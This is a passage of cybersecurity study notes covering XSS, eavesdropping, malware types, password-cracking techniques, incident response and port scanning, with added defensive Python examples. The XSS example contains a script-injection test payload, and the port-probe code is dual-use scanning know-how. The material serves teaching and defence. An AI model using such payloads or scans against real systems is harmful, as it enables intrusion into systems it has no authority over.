only steal cookies, but also log keystrokes, capture screenshots, discover and
collect network information, and remotely access and control the victim’s machine.
While XSS can be exploited via VBScript, ActiveX and Flash, the
most widely abused is JavaScript, primarily because JavaScript is supported
widely on the web.
To defend against XSS attacks, developers can sanitize data input by users in an
HTTP request before reflecting it back. Make sure all data is validated, filtered or
escaped before echoing anything back to the user, such as the values of query
parameters during searches. Convert special characters like ?, &, /, and spaces to
their respective HTML or URL encoded equivalents. Give users the option to
disable client-side scripts.
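The defence above comes down to escaping for the context the value lands in: HTML entities where it is rendered as text, percent-encoding where it is placed in a URL. The following is an added example, not code from the page: a search page's result line rendered once without escaping (the reflected-XSS defect) and once with the standard-library `html.escape` and `urllib.parse.quote` applied per context. The query strings are constructed for the example.

```python
import html
from urllib.parse import quote


def render_results_unsafe(query: str) -> str:
    """Reflects the query straight into the page: any markup in the input is
    parsed by the browser as part of the document, which is the XSS defect."""
    return f"<p>Results for: {query}</p>"


def render_results(query: str) -> str:
    """Escapes per output context. In the paragraph the value is text, so
    & < > " ' become entities; in the href it is part of a URL, so ? & / and
    spaces (among others) become %XX sequences."""
    as_text = html.escape(query, quote=True)
    as_url = quote(query, safe="")
    return (f"<p>Results for: {as_text}</p>"
            f'<a href="/search?q={as_url}">Search again</a>')


if __name__ == "__main__":
    probe = "<script>alert(1)</script>"   # classic reflected-XSS test string
    print(render_results_unsafe(probe))   # the script tag survives into the page
    print(render_results(probe))          # it is shown as literal text instead
```

Escaping on output, at the point where the value meets a specific context, is what makes the same input safe in both the paragraph and the link; filtering on input cannot know which context the value will eventually be rendered in.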

Eavesdropping attack
Eavesdropping attacks occur through the interception of network traffic. By
eavesdropping, an attacker can obtain passwords, credit card numbers and other
confidential information that a user might be sending over the network.
Eavesdropping can be passive or active:
• Passive eavesdropping — A hacker detects the information by listening to
the message transmission in the network.
• Active eavesdropping — A hacker actively grabs the information by
disguising himself as a friendly unit and by sending queries to transmitters.
This is called probing, scanning or tampering.
Detecting passive eavesdropping attacks is often more important than spotting
active ones, since active attacks require the attacker to gain knowledge of the
friendly units by conducting passive eavesdropping beforehand.
Data encryption is the best countermeasure for eavesdropping.

Malware attack
Malicious software can be described as unwanted software that is installed on
your system without your consent. It can attach itself to legitimate code and
propagate; it can lurk in useful applications or replicate itself across the web. Here
are some of the most common types of malware:
• Macro viruses — These viruses infect applications like Microsoft Word or
Excel. Macro viruses attach to an application’s initialization sequence. When
the application is opened, the virus executes instructions before transferring
control to the application. The virus replicates itself and attaches to other
code within the computing system.
• File infectors — File infector viruses usually attach themselves to
executable code, such as .exe files. The virus is installed when the code is
loaded. Another version of a file infector associates itself with a file by
creating a virus file with the same name but an .exe extension.
Therefore, when the file is opened, the virus code will execute.
• System or boot-record infectors — A boot-record virus attaches to the
master boot record on hard disks. When the system is started, it will look at
the boot sector and load the virus into memory, where it can propagate to
other disks and computers.
• Polymorphic viruses — These viruses conceal themselves through varying
cycles of encryption and decryption. The encrypted virus and an associated
mutation engine are initially decrypted by a decryption program. The virus
proceeds to infect an area of code. The mutation engine then develops a new
decryption routine, and the virus encrypts the mutation engine and a
copy of the virus with an algorithm corresponding to the new decryption
routine. The encrypted package of mutation engine and virus is attached to
new code, and the process repeats. Such viruses are difficult to
detect but have a high level of entropy due to the many modifications of
their source code. Anti-virus software or free tools like Process Hacker can
use this feature to detect them.
• Stealth viruses — Stealth viruses take over system functions to conceal
themselves. They do this by compromising malware detection
software so that the software will report an infected area as being
uninfected. These viruses conceal any increase in the size of an infected
file or changes to the file’s date and time of last modification.
• Trojans — A Trojan or Trojan horse is a program that hides inside a
useful program and typically has a malicious function. A major difference
between viruses and Trojans is that Trojans don’t self-replicate. In addition
to launching attacks on a system, a Trojan can establish a back door that
can be exploited by attackers. For instance, a Trojan can be programmed
to open a high-numbered port so that the attacker can use it to listen and then
perform an attack.
• Logic bombs — A logic bomb is a type of malicious software that is
appended to an application and is triggered by a specific occurrence, such as a
logical condition or a specific date and time.
• Worms — Worms differ from viruses in that they do not attach to a
host file, but are self-contained programs that propagate across networks
and computers. Worms are commonly spread through email attachments;
opening the attachment activates the worm program. A typical worm exploit
involves the worm sending a copy of itself to every contact in an infected
computer’s email address book. In addition to conducting malicious activities, a
worm spreading across the internet and overloading email servers may result
in denial-of-service attacks against nodes on the network.
• Droppers — A dropper is a program used to install viruses on
computers. In many instances, the dropper isn’t infected with malicious code
and therefore won’t be detected by virus-scanning software. A dropper can
also connect to the internet and download updates to virus software that is
resident on a compromised system.
• Ransomware — Ransomware is a type of malware that blocks access
to the victim’s data and threatens to publish or delete it unless a ransom is
paid. While some simple computer ransomware can lock the system in a
way that is not difficult for a knowledgeable person to reverse, more
advanced malware uses a technique called cryptoviral extortion, which encrypts
the victim’s files in a way that makes them nearly impossible to recover
without the decryption key.
• Adware — Adware is a software application used by companies for
marketing purposes; advertising banners are displayed while any program is
running. Adware can be automatically downloaded to your system while
browsing any website and may be viewed through pop-up windows or
through a bar that appears on the computer screen automatically.
• Spyware — Spyware is a type of program that is installed to gather
information about users, their computers or their browsing habits. It tracks
everything you do without your knowledge and sends the data to a
remote user. It can also download and install other malicious programs from
the web. Spyware works like adware but is typically a separate program
that is installed unknowingly when you install another freeware application.
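The polymorphic-virus entry above notes that the encrypted body has high entropy and that scanners use this to detect it. The following is an added example, not code from the page or from any tool it names: a Shannon-entropy calculator that scans a file in fixed-size blocks and reports the blocks whose entropy approaches the 8 bits per byte characteristic of encrypted or packed data. The sample "file" is constructed inline (plain text followed by a byte sequence that cycles through all 256 values) and contains no malware; the block size and threshold are illustrative choices.

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for a constant run, up to 8.0 when all 256
    byte values occur equally often, which is what encrypted or well-compressed
    data looks like."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def find_high_entropy_blocks(data: bytes, block_size: int = 256, threshold: float = 7.2) -> list:
    """Return (offset, entropy) for each block at or above `threshold`.
    Plain text and ordinary machine code sit well below 7 bits per byte, so
    blocks above the threshold point to encrypted, packed or obfuscated regions
    worth a closer look."""
    hits = []
    for offset in range(0, len(data), block_size):
        e = shannon_entropy(data[offset:offset + block_size])
        if e >= threshold:
            hits.append((offset, round(e, 2)))
    return hits


# Constructed sample: 1024 bytes of plain text followed by 1024 bytes that cycle
# through every byte value (a stand-in for an encrypted body; not real malware).
PLAIN_REGION = (b"The quick brown fox jumps over the lazy dog. " * 23)[:1024]
ENCRYPTED_LIKE_REGION = bytes((i * 73 + 41) % 256 for i in range(1024))
SAMPLE_FILE = PLAIN_REGION + ENCRYPTED_LIKE_REGION


if __name__ == "__main__":
    print("text block entropy:", round(shannon_entropy(PLAIN_REGION[:256]), 2))
    for offset, e in find_high_entropy_blocks(SAMPLE_FILE):
        print(f"high-entropy block at offset {offset}: {e} bits/byte")
```

High entropy on its own is not proof of malice (legitimate installers and media files are compressed too), which is why scanners use it as one signal among several: a small decryption stub next to a high-entropy region in an executable is the shape the paragraph describes.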

The top 12 password-cracking techniques used by hackers

Some of the most common, and most effective methods for stealing passwords
by: Dale Walker
7 Sep 2021
For many years, passwords were considered to be an acceptable form of protecting
one’s privacy when it came to the digital world. However,
as cryptography and biometrics started to become more widely available to the
public, the flaws in this simple method of authentication became more noticeable. 
It’s worth taking into account the role of a leaked password in one of the biggest
cyber security stories of the last two years, the SolarWinds hack. It was revealed
that ‘solarwinds123’, a password created and leaked by an intern, had been
publicly accessible through a private GitHub repository since June 2018, enabling
hackers to plan and carry out the massive supply chain attack. Despite this, even if
the password hadn’t been leaked, it wouldn’t have been hard for attackers to guess
it. In the words of US politician Katie Porter, most parents utilise a stronger
password to stop their children from “watching too much YouTube on their iPad”.

Passwords that are weak or easy to guess are more common than you might
expect: recent findings from the NCSC found that around one in six people uses
the names of their pets as their passwords, making them highly predictable. To
make matters worse, these passwords tend to be reused across multiple sites,
with one in three people (32%) having the same password to access different
accounts.
It should come as no surprise that passwords are the worst nightmare of a cyber
security expert. To remedy this issue, there are steps worth taking, like
implementing robust multi-layer authentication. When mitigating risks, it is also
worthwhile to consider the steps cyber criminals must take to hack your account and
“know your enemy”. We’ve put together the top 12 password-cracking techniques
used by attackers to enable you and your business to be better prepared.

12 password-cracking techniques used by hackers:

1. Phishing

Perhaps the most commonly-used hacking technique today, phishing is the practice
of attempting to steal user information by disguising malicious content as a
trustworthy communication. Although the term is generally associated with email,
and there are terms to describe other mediums - such as ‘smishing’ (SMS
phishing) - phishing can occur across any type of electronic communication.

The typical tactic is to trick a user into clicking on an embedded link or
downloading an attachment. Instead of being directed to a helpful resource, a
malicious file is downloaded and executed on the user’s machine. What happens
next depends entirely on the malware being executed – some may encrypt files and
prevent the user from accessing the machine, while others may attempt to stay
hidden in order to act as a backdoor for other malware.
As computer literacy has improved over the years, and as users have grown
accustomed to online threats, phishing techniques have had to become more
sophisticated. Today’s phishing usually involves some form of social engineering,
where the message will appear to have been sent from a legitimate, often well-
known company, informing their customers that they need to take action of some
kind. Netflix, Amazon, and Facebook are often used for this purpose, as it’s highly
likely that the victim will have an account associated with these brands.
The days of emails from supposed princes in Nigeria looking for an heir, or firms
acting on behalf of wealthy deceased relatives, are few and far between these days,
although you can still find the odd, wildly extravagant, claim here and there. 
Our recent favourite is the case of the first Nigerian astronaut who is unfortunately
lost in space and needs us to act as a man in the middle for a $3 million dollar
transfer to the Russian Space Agency – which apparently does return flights.
2. Social engineering

Speaking of social engineering, this typically refers to the process of tricking users
into believing the hacker is a legitimate agent. A common tactic is for hackers to
call a victim and pose as technical support, asking for things like network access
passwords in order to provide assistance. This can be just as effective if done in
person, using a fake uniform and credentials, although that’s far less common these
days.
Successful social engineering attacks can be incredibly convincing and highly
lucrative, as was the case when the CEO of a UK-based energy company lost
£201,000 to hackers after they tricked him with an AI tool that mimicked his
assistant’s voice.
3. Malware

Keyloggers, screen scrapers, and a host of other malicious tools all fall under the
umbrella of malware, malicious software designed to steal personal data.
Alongside highly disruptive malicious software like ransomware, which attempts
to block access to an entire system, there are also highly specialised malware
families that target passwords specifically.
Keyloggers, and their ilk, record a user’s activity, whether that’s through
keystrokes or screenshots, which is all then shared with a hacker. Some malware
will even proactively hunt through a user’s system for password dictionaries or
data associated with web browsers.
4. Brute force attack

Brute force attacks refer to a number of different methods of hacking that all
involve guessing passwords in order to access a system.
A simple example of a brute force attack would be a hacker simply guessing a
person’s password based on relevant clues, however, they can be more
sophisticated than that. Credential recycling, for example, relies on the fact that
many people reuse their passwords, some of which will have been exposed by
previous data breaches. Reverse brute force attacks involve hackers taking some of
the most commonly used passwords and attempting to guess associated usernames.
Most brute force attacks employ some sort of automated processing, allowing vast
quantities of passwords to be fed into a system.
5. Dictionary attack


The dictionary attack is a slightly more sophisticated example of a brute force
attack.
This uses an automated process of feeding a list of commonly-used passwords and
phrases into a computer system until something fits. Most dictionaries will be
made up of credentials gained from previous hacks, although they will also contain
the most common passwords and word combinations.
This technique takes advantage of the fact that many people will use memorable
phrases as passwords, which are usually whole words stuck together. This is
largely the reason why systems will urge the use of multiple character types when
creating a password.
6. Mask attack
Where dictionary attacks use lists of all possible phrase and word combinations,
mask attacks are far more specific in their scope, often refining guesses based on
characters or numbers – usually founded in existing knowledge.
For example, if a hacker is aware that a password begins with a number, they will
be able to tailor the mask to only try those types of passwords. Password length,
the arrangement of characters, whether special characters are included, or how
many times a single character is repeated are just some of the criteria that can be
used to configure the mask.
The goal here is to drastically reduce the time it takes to crack a password, and
remove any unnecessary processing.
7. Rainbow table attack

Whenever a password is stored on a system, it is typically stored as a cryptographic
‘hash’ rather than in plain text, which makes it impossible to determine the original
password from the hash alone. To get around this, hackers maintain and
share tables that record passwords and their corresponding hashes, often
built from previous hacks, reducing the time it takes to break into a system
(used in brute force attacks).
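Precomputed password/hash tables, and the offline dictionary attack described earlier (hash a wordlist and compare it against a stolen password file), both rely on the same password always producing the same stored value. The following is an added example, not code from the page: an unsalted SHA-256 for contrast beside a salted, iterated PBKDF2-HMAC-SHA256 store-and-verify pair from the standard library. With a random per-user salt the same password stored twice yields different digests, so a table built in advance does not apply, and the iteration count makes each offline guess correspondingly more expensive. The stored-record format `algo$iterations$salt$digest` is an assumption of this example, as is the sample password.

```python
import hashlib
import hmac
import os


def unsalted_hash(password: str) -> str:
    """What a rainbow table targets: the same password always gives the same
    digest, so one precomputed table answers the question for every user."""
    return hashlib.sha256(password.encode()).hexdigest()


def hash_password(password: str, salt: bytes = None, iterations: int = 600_000) -> str:
    """Salted, iterated hash (PBKDF2-HMAC-SHA256). The 16-byte random salt is
    stored alongside the digest; it is not secret, it only has to be unique.
    The record layout algo$iterations$salt$digest is this example's own."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash record")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    pw = "solarwinds123"   # the weak password the article discusses
    print("unsalted, twice:", unsalted_hash(pw) == unsalted_hash(pw))        # True
    a, b = hash_password(pw, iterations=20_000), hash_password(pw, iterations=20_000)
    print("salted, twice:  ", a == b)                                          # False
    print("verify:", verify_password(pw, a), verify_password("wrong", a))     # True False
```

Salting and iteration do not make a guessable password strong; "solarwinds123" still falls to a short wordlist. What they change is that the attacker must run the wordlist per account, at the cost set by the iteration count, instead of looking every hash up in a table built once.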
8. Network analysers

Network analysers are tools that allow hackers to monitor and intercept data
packets sent over a network and lift the plain text passwords contained within.
Such an attack requires the use of malware or physical access to a network
switch, but it can prove highly effective. It doesn’t rely on exploiting a system
vulnerability or network bug, and as such is applicable to most internal
networks. It’s also common to use network analysers as part of the first phase of
an attack, followed up with brute force attacks.
Of course, businesses can use these same tools to scan their own networks, which
can be especially useful for running diagnostics or for troubleshooting. Using a
network analyser, admins can spot what information is being transmitted in plain
text, and put policies in place to prevent this from happening.
The only way to prevent this attack is to secure the traffic by routing it through a
VPN or something similar.
9. Spidering

Spidering refers to the process of hackers getting to know their targets intimately in
order to acquire credentials based on their activity. The process is very similar to
techniques used in phishing and social engineering attacks, but involves a far
greater amount of legwork on the part of the hacker - although it’s generally more
successful as a result.
How a hacker might use spidering will depend on the target. For example, if the
target is a large company, hackers may attempt to source internal
documentation, such as handbooks for new starters, in order to get a sense of
the sort of platforms and security the target uses. It’s in these that you often find
guides on how to access certain services, or notes on office Wi-Fi usage.
It’s often the case that companies will use passwords that relate to their
business activity or branding in some way - mainly because it makes it easier
for employees to remember. Hackers are able to exploit this by studying the
products that a business creates in order to build a hitlist of possible word
combinations, which can be used to support a brute force attack.
As is the case with many other techniques on this list, the process of spidering is
normally supported by automation.
10. Offline cracking

It’s important to remember that not all hacking takes place over an internet
connection. In fact, most of the work takes place offline, particularly as most
systems place limits on the number of guesses allowed before an account is locked.
Offline hacking usually involves the process of decrypting passwords by using a
list of hashes likely taken from a recent data breach. Without the threat of detection
or password form restrictions, hackers are able to take their time.
Of course, this can only be done once an initial attack has been successfully
launched, whether that's a hacker gaining elevated privileges and accessing a
database, by using a SQL injection attack, or by stumbling upon an unprotected
server.
11. Shoulder surfing

You might think the idea of someone looking over your shoulder to see your
password is a product of Hollywood, but this is a genuine threat, even in 2020.
Brazen examples of this include hackers disguising themselves in order to gain
access to company sites and, quite literally, look over the shoulders of employees
to grab sensitive documents and passwords. Smaller businesses are perhaps most at
risk of this, given that they’re unable to police their sites as effectively as a larger
organisation.
Security experts recently warned of a vulnerability in the authentication process
used by WhatsApp. Users trying to use WhatsApp on a new device must first enter
a unique code that's sent via a text message, which can be used to restore a user's
account and chat history from a backup. It was found that if a hacker was able to
obtain a user's phone number, they are able to download the app to a clean device
and issue a prompt for a new code, which, if they are in spying distance, they could
copy as it arrives on the user's own device.
12. Guess

If all else fails, a hacker can always try to guess your password. While there are
many password managers available that create strings that are impossible to guess,
many users still rely on memorable phrases. These are often based on hobbies,
pets, or family, much of which is often contained in the very profile pages that the
password is trying to protect.
The best way to remove this as a potential avenue for criminals is to maintain
password hygiene and make use of password managers, many of which are free.
FORMING AN INCIDENT RESPONSE TEAM
Your IR plan should include the following sections:
 Plan overview.
 Roles and responsibilities.
 List of incidents that require action.
 Overview of the security posture and the network infrastructure.
 Procedures for detection, investigation, and containment.
 Eradication plan and capabilities.

Who makes up an incident response team?

IT, security team members and other employees with technical expertise across
company systems. The technical team will be the core of the overall incident
response team, and should include security analysts and threat intelligence

What are the five steps of incident response in order?

Five Steps of Incident Response

 PREPARATION. Preparation is the key to effective incident response. ...
 DETECTION AND REPORTING. The focus of this phase is to monitor security
events so as to detect, alert, and report on potential security incidents.
 ANALYSIS. ...
 CONTAINMENT AND NEUTRALIZATION. ...
 POST-INCIDENT ACTIVITY

What does an incident response team do?

An incident response team analyzes information, discusses observations and
activities, and shares important reports and communications across the company.

What are the 4 phases of the incident management lifecycle?

The incident response lifecycle breaks incident response down into four main
phases: Preparation; Detection and Analysis; Containment, Eradication, and
Recovery; and Post-Event Activity.

How do I report cyber attacks?

To report an Internet crime that has occurred in California, contact your local Law
Enforcement Agency; your local High Crimes Task Force; or the Attorney
General's eCrime Unit. They encourage all victims of Internet crimes to also
contact the Internet Crime Complaint Center (IC3).

What is incident reporting in cyber security?

Incident reporting allows an organisation to prove that it takes security
seriously and to demonstrate the mitigative actions taken. A reporting system should
allow an organisation to record the details of a suspected breach and then output
these to generate a report if a breach notification is required.

Who is responsible for reporting a cyber security incident?

Security unit liaisons or their designees must report suspected serious incidents
(reported to or identified by them) within the 24-hour timeframe.
EXAMPLE:
How do I report a scammer on Facebook?
How do I report a Facebook account or Page that's pretending to be me or
someone else?
1. Go to the profile of the impersonating account. ...
2. Tap below the cover photo and select Find Support or Report Profile.
3. Follow the on-screen instructions for impersonation to file a report.
Reverse engineering
The process of taking a piece of software or hardware and analyzing its
functions and information flow so that its functionality and behavior can be
understood. Malware is commonly reverse-engineered in cyber defense.

Why is reverse engineering important in cyber security?

In software testing, reverse engineering aids testers' understanding of viral and
other malware code. In software security, reverse engineering is widely used to
ensure that the system lacks any major security flaws or vulnerabilities. It helps
to make a system robust, thereby protecting it from hackers and spyware.
What is reverse engineering?

Reverse engineering (also known as backwards engineering or back
engineering) is a process or method through which one attempts to
understand through deductive reasoning how a previously made device,
process, system, or piece of software accomplishes a task with very little
(if any) insight into exactly how it does so.

What is Nmap in cyber security?

Nmap (Network Mapper) is a free, open-source command-line tool. Nmap is an
information-gathering tool used for reconnaissance. Basically, it scans hosts and
services on a computer network, meaning it sends packets and analyzes the
responses.

ZENMAP:
Zenmap is the official Nmap Security Scanner GUI. It is a multi-platform
(Linux, Windows, Mac OS X, BSD, etc.) free and open source application
which aims to make Nmap easy for beginners to use while providing
advanced features for experienced Nmap users.

PORT SCANNER in cyber security

A port scan is a method for determining which ports on a network are
open. As ports on a computer are the place where information is sent and
received, port scanning is analogous to knocking on doors to see if someone
is home. ... It is also valuable for testing network security and the strength of
the system's firewall.

How Does a Port Scanner Operate?

A port scanner sends a network request to connect to a specific TCP or
UDP port on a computer and records the response. ... If you wanted to
check to see if your web server was operating correctly, you would check
the status of port 80 on that server to make sure it was open and listening.
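The single-port check described above, written out as an added example (not code from the original document): probe_port() attempts one TCP connection and classifies the outcome as open, closed or filtered, and a throw-away listener on 127.0.0.1 stands in for "your web server" so the demo runs offline on a port the operating system assigns, not on any real host.

```python
"""TCP port check of the kind the paragraph describes.

Added example, not from the original document. The listener below is a
local stand-in for a web server; the port number is OS-assigned at run time.
"""
import socket

def probe_port(host: str, port: int, timeout: float = 1.0) -> str:
    """Return 'open', 'closed' or 'filtered' for one TCP port.

    Completed handshake: something is listening (open). Immediate refusal:
    the host answered but nothing listens there (closed). No answer before
    the timeout: usually a firewall silently dropping the SYN (filtered),
    which is why the same check doubles as a test of the firewall.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return "open"
        except ConnectionRefusedError:
            return "closed"
        except socket.timeout:
            return "filtered"

def start_local_listener() -> tuple:
    """Bind a listening socket on 127.0.0.1 at an OS-assigned port, standing
    in for a web server on port 80. The kernel completes handshakes from the
    listen backlog, so no accept() loop is needed for the probe to see 'open'."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    return srv, srv.getsockname()[1]

def demo() -> dict:
    """Probe the port while it is listening, then again after shutdown."""
    srv, port = start_local_listener()
    try:
        while_listening = probe_port("127.0.0.1", port)
    finally:
        srv.close()  # releases the port; later connects are refused
    after_shutdown = probe_port("127.0.0.1", port)
    return {"port": port, "listening": while_listening,
            "after_shutdown": after_shutdown}
```

Run against your own server, the 'filtered' result is the one to watch for: it means the firewall, not the service, is answering.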


Most often, cyber attacks happen because criminals want your:

 business' financial details.
 customers' financial details (e.g. credit card data).
 sensitive personal data.
 customers' or staff email addresses and login credentials.
 customer databases.
 client lists.
 IT infrastructure.
